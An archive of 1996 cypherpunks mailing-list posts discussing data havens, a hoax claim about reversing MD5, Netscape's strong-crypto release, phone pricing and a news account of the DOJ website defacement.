>> Cody's Bookstore, on El Camino Real in Menlo Park (hard to miss). Or at the
>> coffee shop next to it...either should be sufficient Schelling points to
>
>Do you mean Kepler's? That's the one right near Menlo Park caltrain
>station; the coffee shop next to it is  Cafe Borone. Get the Mocha.
>

Yeah, I was thinking of Kepler's. (Cody's is in Berkeley, of course.)

Once again: KEPLER'S BOOKS.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Sun, 18 Aug 1996 18:48:02 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Orbiting Datahavens
In-Reply-To: <199608180358.UAA29680@mail.pacifier.com>
Message-ID: <199608180736.CAA08078@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 06:32 PM 8/17/96 -0500, snow wrote:
> 
> >
> >     It is just as easy to take out a satelite in LOE as it is to sink an
> >oil rig, plus swapping defective Hard Drives is a real bitch.
> 
> Hard drives don't work in a vacuum, at least conventional ones don't.  (And 
> I'm not aware of any hard drives which are designed to be permanently 
> pressurized against a hard vacuum, either...)

Also, the corona effect is a real bear too.  Hard drives wouldn't be able
to have the little bit of air the heads float on, and contact at 3600/7200
rpm is not good for the drives.

Then you get hard radiation that plays hob with the circutry.

Even if nobody attacked the LOE satellite, there is always space debris.

> 
> Jim Bell
> jimbell@pacifier.com
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Sun, 18 Aug 1996 18:30:17 +0800
To: cypherpunks@toad.com
Subject: Re: MD5 completely broken!
Message-ID: <199608180701.DAA13334@cliff.cris.com>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sun Aug 18 02:56:44 1996
> 
> >Atfer much scientific research, I have finally found a way to restore 
> >any message given only its MD5 checksum.
> 
> uhm, congratulations <g>
> 
> 
> maybe next time when you break a code and want to make
> some $$$, sell your solution in secret 
> to the people who patented it!!
> 

Not to mention that this is complete nonsense and a troll. No matter how 
weak the MD5 algorithm may or may not be, there are an infinite number of 
possible messages for each checksum. And thus the original message could 
NEVER be restored. Its as secure as a OTP. That's why its called a 
'one-way' hash function.

Not to mention the fact that he misspelled both 'entropy' and 'after'.


P.S. But imagine if it was true! MD5 would become the ultimate compression 
algorithm. Any message could be reduced to a 128 bit archive.
- --
David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMha+reSLhCBkWOspAQFvkQf+PE2+p8gLJ5Fcg64fKogAaad1v0KUAm6N
PDWKqOF87hr4GK7Je0TnflQ5640w11CbqnhQeTeuMZ1vypJ+OMod7riY+okd4VQL
tLaAA91EuzDLUnSnh3VT16MmN152RTWWS0fufASdJPw2aknhC5NA8kp+0ryQUo+f
zICE619/4I0Hjz6qwIzuEYD7tMW1OEz5KGRpyLnZaiOFXObxLHQ4/QwUuJVfLrY0
GrKxNrmtIMiFyHqksbmg22G8f9SsziKa8TjoHDrq2UIL7ForTneC/C20HTOVh9iS
6+C9u2Wij+AFEgPQSZMyxP0Wb8m20DcoeOpnzbBLBVw9BfiqNApvUQ==
=Nu+T
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Sun, 18 Aug 1996 19:33:01 +0800
To: adamsc@io-online.com
Subject: Re: forget photographing license plates!
In-Reply-To: <19960818051206140.AAC174@IO-ONLINE.COM>
Message-ID: <199608180819.DAA00270@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I'm just waiting for them to integrate with TRW. Then, with people
> they've determined can afford a new one, they can trigger the car to have
> mysterious engine failures...

Or the minute one falls behind on their bill, the engine doesn't start.

This is legal, IIRC (I am not sure of the exact court case, but one
company had a software vendor disable their sales software by remote for
not paying their bill, and the court upheld the software vendor.  I don't
remember the specifics on this.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 18 Aug 1996 20:59:26 +0800
To: Alex de Joode <usura@replay.com>
Subject: Re: Final release of Navigator (with strong crypto) now available
In-Reply-To: <199608181037.MAA14188@basement.replay.com>
Message-ID: <3216F54C.425C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex de Joode wrote:
> 
> Jeff Weinstein (jsw@netscape.com) wrote:
> 
> : The final release of Navigator 3.0, complete with non-exportable
> : strong crypto, is now available for download by US citizens.  Note
> : that this is the released version of 3.0, so it will not expire.
> : You can get it from:
> 
> Would it be possible to both supply an Linux ELF and a.out binary ?

  No, we will only be supplying ELF.  Since linux is not officially
supported, we really don't have the resources to do multiple versions.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sun, 18 Aug 1996 19:27:13 +0800
To: DAVID A MOLNAR <molnard1@nevada.edu>
Subject: Re: US Taxes on X-Pats
In-Reply-To: <Pine.OSF.3.91.960817172848.6275A-100000@pioneer.nevada.edu>
Message-ID: <Pine.LNX.3.91.960818042027.22538B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 17 Aug 1996, DAVID A MOLNAR wrote:
> On Sat, 17 Aug 1996, Vincent Cate wrote:
> > It is not exactly that bad if you are outside the USA. I got ahold of the
> > IRS codes on this before I left the USA (so about 2 years ago).  The rule
> > then was that the first $70,000 you earned was tax free if you were
> > outside the USA for 330 days or more of the year.  From another x-pat in
> > Anguilla I heard that the $70 K had been increased. 
> 	Is this so? Last I had heard, Congress was looking at eliminating 
> the credit altogether. It's slightly misleading to call it "tax free", 
> though; the way I understand it, it's not included in the IRS's 
> estimation of your assets, but may play a factor in determining the final 
> amount of $$$ you end up paying. Very rarely does it translate directly 
> into a $70,000 break on your taxes, although it does help.

I am sure one of the 100+ X-Pats on this island would have been talking
about it if this were going to be eliminated, and I have not heard
anything. So I am sure it is still there.  But you can call 1-800-tax-1040
to check. After they finish with this question, ask them what it means in
the tax code where it says that income taxes are "voluntary complience". 
Have your Websters open to the definition of voluntary. Always good for a
laugh. 

The idea was no taxes on the first $70,000 earned outside the USA.
Dividends and interest were not counted as "earned".

Having $70,000 that you can earn tax free will never translate into a
$70,000 break on your taxes (unless they get to 100% tax rate). 

   --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Sun, 18 Aug 1996 19:57:18 +0800
To: cypherpunks@toad.com
Subject: Re: Hackers invade DOJ web site
Message-ID: <199608180942.EAA08054@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>CNN online (http://www.cnn.com) is reporting a "breakin" by "hackers"
>to the DOJ web site.  They don't elaborate exactly how thy did it.

I certainly don't support the person or people responsible for this and it may
very well end up having an overall negative impact.  Since it has happened,
however, I think those in a position to do so should start with the spin
control.  Some suggestions:

   The fact that even the U.S. Justice Department is unable to adequately
   protect it's own site from intruders underscores the need for widely-
   available strong encryption.

   While this is certainly a major embarrassment for the Justice Department,
   at least the mandatory "key escrow" program the Clinton administration is
   insisting upon has not yet been implemented; no private citizens' data
   appears to have been compromised this time.

   It's doubtful that a new law or government bureaucracy would have prevented
   this from happening but it's entirely possible that tools such as strong
   encryption could have.  It's ironic that the U.S. Government is focusing on
   the former while fighting use of the latter.

This event could potentially draw a lot of interest from the general public.
Since we're dealing with public perceptions largely created through the main-
stream media, it's important to remember that "sound bites" are more important
than carefully reasoned arguments.

                          | (Douglas) Hofstadter's Law:
                          | It always takes longer than you expect, even 
Frank Stuart              | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Mon, 19 Aug 1996 00:55:57 +0800
To: jsw@netscape.com
Subject: Re: Final release of Navigator (with strong crypto) now available
In-Reply-To: <321677C2.663B@netscape.com>
Message-ID: <m2vieg4vgl.fsf@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



How's that database so that people in Canada can download the
128-bit version coming along?

Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 18 Aug 1996 23:51:39 +0800
To: cypherpunks@toad.com
Subject: Re: MD5 completely broken!
In-Reply-To: <199608180701.DAA13334@cliff.cris.com>
Message-ID: <HwTusD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"David F. Ogren" <ogren@cris.com> writes:
> P.S. But imagine if it was true! MD5 would become the ultimate compression
> algorithm. Any message could be reduced to a 128 bit archive.

The following is true. There used to be company in Silicon Vallye that marketed
compression software guaranteed to reduce any file to no more than 128K, no
matter how large the input. That side worked. The decompression side didn't.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sun, 18 Aug 1996 22:40:39 +0800
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: MD5 completely broken!
In-Reply-To: <199608180349.WAA01402@manifold.algebra.com>
Message-ID: <32170F4A.56F2@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> 
> Atfer much scientific research, I have finally found a way to restore
> any message given only its MD5 checksum....
>
> The price of the library is to be determined.

I'll trade ya my bridge for it.  (It's in New York now; I'd have to 
go get it.)

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Aug 1996 00:33:16 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla
In-Reply-To: <Pine.LNX.3.91.960817154651.21014E-100000@offshore>
Message-ID: <w5uusD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Vincent Cate <vince@offshore.com.ai> writes:
> The rumor is that Cable and Wireless bribed the previous government with
> things like a free loan of a bulldozer worth $500/day for a couple weeks
> to get their 30 year monopoly contract.  Given that CandW is making
> millions each year, seems they got off cheap, if true.  Claim is that the
> UK does not mind their companies bribing officials, and CandW does it alot
> all around the world.

I don't see a problem with that. All governments are corrupt by definition.
As far as I know, the U.S. is the only country in the world prohibiting
its businesses from bribing foreign officials with the silly law known
as the Foreign Corrupt Practices act (as if U.S. politicians didn't take
bribes!) The results are: U.S. businesses not being competetive in the
international markets where bribes are the traditional part of doing
business, and a significant paperwork/compliance cost in all other
international markets.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Roger Healy OBC)
Date: Mon, 19 Aug 1996 01:23:28 +0800
To: jsw@netscape.com
Subject: Re: Final release of Navigator (with strong crypto) now available
In-Reply-To: <3216F54C.425C@netscape.com>
Message-ID: <199608181505.IAA08709@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Alex de Joode wrote:
> > 
> > Jeff Weinstein (jsw@netscape.com) wrote:
> > 
> > : The final release of Navigator 3.0, complete with non-exportable
> > : strong crypto, is now available for download by US citizens.  Note
> > : that this is the released version of 3.0, so it will not expire.
> > : You can get it from:
> > 
> > Would it be possible to both supply an Linux ELF and a.out binary ?
> 
>   No, we will only be supplying ELF.  Since linux is not officially
> supported, we really don't have the resources to do multiple versions.

ELF is cool.  What about BSD?  I've seen how you support BSDI so the 
binary should work with FreeBSD or NetBSD.?


--
Love,
Qut@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Aug 1996 00:33:08 +0800
To: cypherpunks@toad.com
Subject: Re: Credit enforcement
In-Reply-To: <Pine.SV4.3.91.960817184151.21584C-100000@larry.infi.net>
Message-ID: <XFVusD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@infi.net> writes:

> I thought that classical libertarians agree that the enforcement of
> contracts is a proper function of the government.

Then your classical libertatians are fucking statists.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 19 Aug 1996 02:00:11 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: BlackNet as a Distributed, Untraceable, Robust Data Haven
Message-ID: <199608181532.IAA18019@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 PM 8/17/96 -0700, Vladimir Z. Nuri wrote:
>
>>I have to speak up here and say that there is an actual working exemplar of
>>a distributed, untraceable data haven. While it lacks a robust _payment_
>>mechanism, that is also untraceable, so does the "Visit Port Watson"
>>example (which has never actually existed).
>
>agree with Jim Bell that blacknet by any stretch of the imagination
>is not a "data haven". 

I've not yet commented on this thread!  Sounds like you're confusing me with somebody else.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 19 Aug 1996 03:39:03 +0800
To: vipul@pobox.com
Subject: Re: FCC_ups
Message-ID: <199608181544.IAA18394@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:36 AM 8/18/96 +0000, Vipul Ved Prakash wrote:

>> >First flat rates would have to go out.
>> >If Alice uses her phone for 5 hrs in month and pay _x_ dollars and Bob uses
>> >his for 100 hrs and pays _x_ dollars, then Alice is subsidising Bob, which
>> >is not really ethical. Everyone should pay for the amount of bandwith 
>> >one is using.  
>> 
>> I'm afraid you're promoting what I consider a rather old (and, now, odd) 
way 
>> to look at it.  Unlike old mechanical telephone switches, the new hardware 
>> does not "wear out" and thus a person who uses it more doesn't cost the 
>> phoneco any more bucks.  If that's the case, I don't see the logic in 
>> charging a person more for greater use.  
>> 
>Machinery 'wear and tear' is a small part of Infrastructure maintainance 
costs. There are tons of other things. Hidden costs, management, laying new 
pipes,etc. 

Well, let's consider such costs.  Most of which (maintenance, management, 
rolling stock) are unrelated to amount of telephone usage.  So there is no 
reason that these costs should be unequally attributed to a person who makes 
local calls 1 hour per day, as opposed to another who only calls 15 minutes 
per day, for example.

As for the "laying new pipes" issue:  Years ago in the the US, when 
inter-central-office trunk connections were all implemented using large 
bundles of copper pairs, it would have been _correct_ to say that higher 
telephone usage resulted in larger costs, since more trunk lines were 
necessary.  Today, on the other hand, inter-office trunks (at least the new 
ones, and I presume that even many of the old ones have been switched over) 
are implemented in fiber optics.  Extra capacity is either automatically 
available (since the capacity of a given fiber is unlikely to be fully used) 
or can be fairly simply added by converting old fiber from about 450 
megabits per second to 2.4 gigabits, or even faster rates which have become 
more recently available.


>But you miss my point, if a phoneco is not getting a penny for its long 
distanceservices (which subsidise the flat rate local calls) then the choice 
would
>be to close down. Which would be a severe attack to the local internet usage.

That's an entirely unsupported claim.  Nobody claims that telephone usage 
(term used generically) is on the way out.  "Closing down" is only going to 
happen if local phonecos cease to be able to provide a service that people 
are willing to pay for.

And as for the amount of the subsidy, let's look at it.  I've read around 
here recently that the amount of the charge is 3 cents per minute.  If we 
assume an average LD rate of 15 cents per minute, that's 20% of the  bill.  
If an average LD bill is $15 per month, that's only $3 per line, per month.  
It seems to me that those local phonecos could simply raise their local 
charges by this and totally compensate for the loss of that subsidy.  
However, an even more likely outcome is that they will make structural 
changes which they've been able to avoid after decades as a regulated, 
monopolized business:  Reduce personnel levels, especially in areas other 
than those in which they are actually providing telephone service.  Reduce 
salaries from "comfy" to "competitive."  

Before it was broken up in 1983, AT+T was a regulated monopoly and was, more 
or less, guaranteed a profit.  Extra costs, such as higher staffing levels 
and higher salaries, simply increased the rates, they didn't reduce the 
profits.  This system is still in force with the local phoneco side of the 
business.

Anther thing which could be done, from the government's side (as part of an 
industry restructuring) is to allow phonecos to greatly accelerate their tax 
write-off of existing depreciating equipment, perhaps down to as low as 5 
years or so.  The theory is, these phonecos are going to start competing 
with companies who are only buying their equipment today, and it would be 
unfair to saddle the older companies with old, inefficient equipment without 
allowing them to completely write it off quickly.  (This, of course, doesn't 
mean that they need to actually take it out of service...)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sun, 18 Aug 1996 18:36:34 +0800
To: cypherpunks@toad.com
Subject: Re: Data_havens
Message-ID: <199608180657.IAA05470@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


> Auctually, the one real big problem is that the data is all in one place.  
	I would rephrase this slightly to read "the data, or knowledge of 
its location, is all in one place." Sure, with a satellite, both the data 
and the info required to access it is in the same physical location; it's 
a target as soon as someone tracks a transmission to its source.
	But I think there will be problems, even with distributed 
systems, for a haven under the control of any single entity. Whether that 
control is implicit, such as the coercive force of the host governments, 
or the explicit policies of the owner, it will tend to force patterns in 
data storage. This could become problematic.

[snip]
> The only workable solution to this that I can see has nothing to do with 
> floating countries or anything of the sort.  Instead, the use of 
> data-splitting programs could be used.  I'm not all up on the security or 
> reliability of these programs, so if I'm making unwarranted assumptions, 
> guess I did a lot of typing for nothing.  This has probably been proposed 
> before, too, but what the hey...
	Actually, Eric Hughes gave an inspirational talk on this very 
subject at DEF CON IV. I have to say that I'm a convert, now. Time to go 
forth and make the world safe for crypto-anarchy. Much of what I'm going 
to say is influenced by that talk. My only regret is that I didn't get his 
autograph. Enough about that...
	Basically, I think allowing a single entity to create such a 
network may lead to a dangerous concentration of information. If we are 
to assume that an attack on a data haven will involve the resources of 
large, unfriendly governments, along with the full legal (and 
extra-legal) powers of said governments...then it becomes possible to 
imagine a scenario where one's "network technique" is _studied_ in order 
to find possible caches for servers in the data-haven network.
	Once the location of the servers/caches are known, the network 
becomes vulnerable to seizure. In friendly jurisdictions, subopenas and 
warrants may be issued. In unfriendly or extra-jurisdictional 
circumstances (e.g. space), one uses anti-satellite measures, black-bag 
jobs, bribes, or, heck, let's be 
paranoid and say they can send TEMPEST-equipped vans to sit outside and 
read the hard drives directly. Even if seizure is made impossible, enough 
heat can be brought to bear to limit the growth of one's haven_net and 
concentrate new nodes in certain specific jurisdictions...which of course 
become more attractive targets for seizure tactics.
	The problem is that a single entity may tend to keep records of 
what nodes are situated where. Not necessarily in the protocols, either. 
All those computers will need servicing, upgrading, network links, etc. 
etc. This requires some kind of a control and payment structure. Setting 
up a new node is particularly hazardous, especially after initial 
deployment. To make matters worse, once a node is found, it may leak 
information about the rest of the network (traffic analysis, anyone?). 
	What is more, it leaves open the door for truly stupid acts, like 
keeping a network map where it might be found in case of a search. Don't 
laugh. A good deal of design will need to go into a data haven; if the 
documents are not destroyed or secured in some way, they could bring down 
the whole system.



> For example, lets say you set up an office in 100 countries (it would be 
> more effective to have more, but let's say 100).  Through the use of 
	This can be a double-edged sword. 100 countries means 100 
_different_ points for an adversary to bribe/steal/warrant his way onto a 
point in one's haven_net. Sure, maybe he can't get _all_ of them, but 
what can he do with the nodes he does have? Note that the haven operator 
may not necessarily know a jurisdiction or node has been compromised; how 
many times have you detected the NSA reading your personal e-mail? (on 
second thought, don't answer that question :)

	I honestly believe it is necessary to involve mass numbers of 
_individuals_ or small groups in a sort of Godwin-esque federation for a 
robust, reliable, and unkillable haven_net. This implies a certain degree 
of flux on the part of the network; nodes have the right to secede at any 
time. The trick is to make it financially rewarding to be a part of the 
network, so the number of new nodes exceeds the number of imprisoned 
crypto-rebels/dilettantes/students looking for a buck/other former 
node-type people. 
	A "data haven", then, in the sense of a corporation which manages 
and serves the stuff, is more of a coordinator or a broker than a 
warehouser. It acts as a front end to such a distributed system, and 
assumes the risk if the client's data should fall through the cracks. The 
added value over entering the system oneself comes from the technical 
assurance and insulation from legal risk. 	

[description of obtaining user ID and password thru anon remailers]
	Not such a bad idea, but I don't know about tying the ID and 
password to a specific number of nodes. Certainly it minimizes leakage of 
one's client list; certain nodes only serve a particular subset of 
clients. What happens if enough of the client's nodes are seized? 

Also, what about spoofing and lost identities? Sure, the protocols involved 
between haven and client may offer no chance of either, but what about 
the client's network? Just because they are paranoid enough to use a 
data-haven does not mean they are clueful enough to encrypt that modem 
link they may be using for SLIP, PPP, or whatever. 

> To get the data back, he would send in the ID and password, encrypted 
> again, to the nessecary number of offices in order to retrieve the data.
	One of the ideas advanced at DEF CON, and one I really liked, was 
to make the data retreivable simply by knowing its MD5 hash. No need for 
identies, no worrying about keeping a meta-secret or nym secret...just 
keeping or revealing the hash for file-by-file protection. 
	Now, of course, what if the user loses his hash?
 
> Payment, if nessecary, could be made by anonymous bank transfer or 
> something like ecash.
	I like the idea of allowing a node to accept payment up front, or 
accept for free (but charge a fee to downloaders). Each node can set its 
own prices in terms of e$/MB or other units (you like octets? 
megawords?) for a given amount of data. I'd like to accept "in-demand" 
data (Quake alpha, anyone?) on a 'consignment basis', but can't figure 
out how to ensure the node pays the original uploader w/o blowing away 
anonymity. Anyone got a paper lying around which could help (beg beg beg)?
	Anonymous bank transfer is probably a good idea, too, but it can 
be a major hassle. Not just from the State, either; how do you keep track 
of what money transfer came from which nym? 


  > 
> Proprietary encryption systems (PGP-like, with IDEA/RSA hybrid in it, but 
> can accept 5000+ bit keys and padding) might be used, as well.  
	IMHO, this kind of application will need to be built anew, and 
built well. Becoming a new node should be an install-and-forget process. 
This requires certain features. Most importantly, the node's owner should 
not known, and should not be _able_ to know what exactly he or she is 
storing. I haven't looked at the new steg and crypto packages for linux, 
but that's about what I'm thinking of.


> 
> This scheme has several pluses.  One, it doesn't rely on any fancy legal 
> manuevering with off-shore nationalities and crap.  Second, it isn't very 
	None of that is really necessary for a data haven, anyway. Why 
bother, when the whole point is to disappear it from physical space in 
the first place?? It simply allows Them to have a single point of attack.

> vunerable.  They would need to get legal jurisdiction in 70 different 
> countries to sieze the data, and then they have the encryption to deal 
> with.
	Unfortunately, it also means if they get jurisdiction in even one 
of those 70 countries, you are in trouble. Even if the encryption is 
good, just looking at how much data is on the server, and from where, 
could be most unfortunate for business. There's a more serious concern in 
reliability, too; if one uses a data-splitting scheme, capturing enough 
servers has a probability of removing access to data.
That's bad for business.

>  Third, if there's any server problems, it wouldn't affect the entire 
> system.  Fourth, you don't have to attach missle launchers and hire a 
	No, but again the splitting scheme needs to be smart. (M, N) 
thresholds would be good; losing one server wouldn't mean losing the 
data. It also forces Them to capture N servers instead of just one.

> private security force to defend it.  There are several problems, though.  
> First, it relies on the Internet, something which is inherantly insecure 
> anyway.  Second, if someone's being wiretapped in their own country, then 
> the whole effort is in vain.  Third, it would be incredibly costly, but 
	It is not necessary to obtain a warrant to wiretap. We know that. 
The system then relies upon the security of the locations of the servers. 
I am very skeptical of the idea that this can be acheived with a single 
organization.

> probably no more so than any kind of off-shore platforms.  In fact, it 
> would probably be cheaper.  
	What we really need is a robust architecture, like Eric Hughes' 
"Universal Piracy Network" which is as popular and as prevalent as 
<name your favorite app> is today. We need to make it easy, simple, 
profitable, and most of all, _FUN_. Getting people financially dependent 
on such a system wouldn't hurt, either.

> 
> Any comments?
	I have a vision...and I caught it just recently...of a day where 
I will be able to sell my disk space to the highest bidder, and know I am 
helping the cause of freedom and frictionless data.

A day where I can go forward and create value from "garbage" - unused 
cycles, unused HD space, underutilized graphics cards and coprocessors 
mouldering away in closets. Where people spontaneously join haven_nets 
because it's "cool", or "sensible", or any of the other justifications 
people make when they're jumping off the cliff with the other lemmings. 
When participation is a mouse-click away. When the NSA advises 
Congresscritters on how to best distribute their files, and spends most 
of its time figuring out cost/benefit analyses of the myriad haven_nets, 
and actively contributing its own latest, greatest, and "just 
unclassified" entry into the market for server software.

When no one will be able to imagine having a file without splitting it 
across half a dozen countries and half a hundred computers. Where it will 
be those who want un-encrypted data who are "strange" and "old fogies", 
because distributed data is _orthodox_, and the anonymity and e-cash is 
just a simple little feature, along with the rest, and hardly worth 
mentioning in and of itself. In short, no where. Utopia. But a nice 
vision to get wild-eyed and hand-waving about just the same.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Mon, 19 Aug 1996 03:56:23 +0800
To: cypherpunks@toad.com
Subject: Re: Hackers invade DOJ web site
Message-ID: <199608181609.JAA22778@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:42 AM 8/18/96 -0500, you wrote:
>>CNN online (http://www.cnn.com) is reporting a "breakin" by "hackers"
>>to the DOJ web site.  They don't elaborate exactly how thy did it.

Well the DOJ site still is down, but here's some details I pulled out of a
USENET newsgroup this morning (hopefully L.G. Shirley won't mind the
forward).  All in all, it sounds like a fairly childish stunt...

From: "L. G. Shirley" <lgshirley@mail.worldnet.att.net>
Newsgroups: rec.radio.scanner
Subject: DOJ homepage hacked!!!
Date: 17 Aug 1996 22:47:59 GMT
Organization: AT&T WorldNet Services
Lines: 49
Message-ID: <4v5i6v$hm8@mtinsc01-mgt.ops.worldnet.att.net>

About 10PM last night I clicked on my bookmark for the Federal Gov't and 
then selected, by random, the Dept of Justice.


                      http://justice2.usdoj.gov/


SURPRISE!!!!!!!!!! Someone had made a few changes, For one it is now 
called the Department of Injustice. You are immediately greeted by the 
Nazi swastika all over your screen's background.

A flag w/the symbol is apparent. George Washington's picture is captioned 
with his words, "Move my grave to a free country! This rolling is making 
me an insomniac".

Janet Reno's portrait has been replaced by Hitler's. And a flag now bears 
the Nazi symbol. She is now called Attorney General Furher.

There is plenty of nudity and the many links will take you to places you 
may never have been before. I don't think we're in Kansas anymore Toto!

I have no clues how it was done or when. My guess is someone changed all 
the links to the DOJ page to another one, the one you see when you click 
on the DOJ's homepage.

I worked today and when I came home and tried to get back to the DOJ's 
page, no luck. Must be a major overload <grin> of people trying to get to 
the link of women clad in, well, next to nothing and tied with rope!

I don't think the author will make any brownie points w/women. He hacked 
the homepage they have w/the DOJ on violence against women. I'm not 
condoning such action and violence is a very serious issue but whoever did 
the hack was also very serious.

He changed a Clinton speech on affirmative action and insulted blacks with 
his choice of words. There is a lot of rambling about the internet and the 
Gov't taking away our rights on it.

The author has a interesting slant on things. This should be enough of a 
warning if you're easily offended by racism, hate, foul language, porn on 
the net, and general crudeness. Don't go there.

I would like to know just how this was done, any ideas? Is it that easy to 
hack someones homepage?

I wonder how long it'll be before this homepage link is removed and can 
they find who did the evil deed? Two months on the Net and just when I 
think I'd seen it all, wow.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sun, 18 Aug 1996 23:23:58 +0800
To: cypherpunks@toad.com
Subject: Orbiting Datahavens
Message-ID: <TCPSMTP.16.8.18.9.26.14.2645935021.663003@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> How about an orbiting DataHaven. No jurisdiction to bother with,
 In> extremely difficult to get to (except by large governments...). You
 In> could put together a couple of Linux boxes with a RAID system, some
 In> backups and a large solar panel and have a very nice, secure DataHaven.

 I bet one of those "weather" satalites would blow that thing out of the
 air in no time flat... :)


 P.J.
 pjn@nworks.com



... "Very funny, Scotty. Now beam down my clothes."

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arnauld Dravet <scraver@mnet.fr>
Date: Mon, 19 Aug 1996 00:33:00 +0800
To: cypherpunks@toad.com
Subject: Netscape under Linux (Vs microsoft)
In-Reply-To: <199608181037.MAA14188@basement.replay.com>
Message-ID: <32173372.25BEFC52@mnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
> 
> Alex de Joode wrote:
> >
> > Jeff Weinstein (jsw@netscape.com) wrote:
> >
> > : The final release of Navigator 3.0, complete with non-exportable
> > : strong crypto, is now available for download by US citizens.  Note
> > : that this is the released version of 3.0, so it will not expire.
> > : You can get it from:
> >
> > Would it be possible to both supply an Linux ELF and a.out binary ?
> 
>   No, we will only be supplying ELF.  Since linux is not officially
> supported, we really don't have the resources to do multiple versions.
> 
>         --Jeff
> 
> --


yesterday i was in #linux on irc , and several pplreports some bugs with
netscape under linux.i got some too many times a day... Netscape crashes
